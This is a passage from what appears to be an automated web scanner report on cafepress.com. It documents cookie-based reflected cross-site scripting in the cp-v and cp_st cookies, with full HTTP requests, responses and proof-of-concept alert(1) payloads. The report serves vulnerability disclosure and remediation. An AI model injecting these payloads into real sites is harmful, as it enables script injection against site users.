Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=ae66d</script><script>alert(1)</script>eabb41eb2b2; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59702
Date: Sun, 26 Dec 2010 13:46:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:42 GMT; path=/
Set-Cookie: cp_sc=100093; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:42 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'ae66d</script><script>alert(1)</script>eabb41eb2b2'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.74. http://www.cafepress.com/+womens-thongs [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+womens-thongs

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d1e3"-alert(1)-"b1f51daa56d was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+womens-thongs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA5d1e3"-alert(1)-"b1f51daa56d; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 59312
Date: Sun, 26 Dec 2010 13:47:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/
Set-Cookie: cp_sc=100115; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA5d1e3"-alert(1)-"b1f51daa56d";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.75. http://www.cafepress.com/+womens-thongs [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+womens-thongs

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b983</script><script>alert(1)</script>ebe8ab7f2c6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+womens-thongs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=5b983</script><script>alert(1)</script>ebe8ab7f2c6; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59334
Date: Sun, 26 Dec 2010 13:47:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:23 GMT; path=/
Set-Cookie: cp_sc=100115; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:23 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '5b983</script><script>alert(1)</script>ebe8ab7f2c6'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.76. http://www.cafepress.com/+yoga-mats [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+yoga-mats

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa7a8"-alert(1)-"e7fc2e4ad80 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+yoga-mats HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAfa7a8"-alert(1)-"e7fc2e4ad80; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59513
Date: Sun, 26 Dec 2010 13:49:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:05 GMT; path=/
Set-Cookie: cp_sc=201675; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:05 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAfa7a8"-alert(1)-"e7fc2e4ad80";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.77. http://www.cafepress.com/+yoga-mats [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+yoga-mats

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f3e8</script><script>alert(1)</script>edf8d16990b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+yoga-mats HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4f3e8</script><script>alert(1)</script>edf8d16990b; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 59529
Date: Sun, 26 Dec 2010 13:49:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/
Set-Cookie: cp_sc=201675; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '4f3e8</script><script>alert(1)</script>edf8d16990b'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.78. http://www.cafepress.com/TheGamingApe [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /TheGamingApe

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62888"-alert(1)-"6e0c4f15927 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TheGamingApe HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 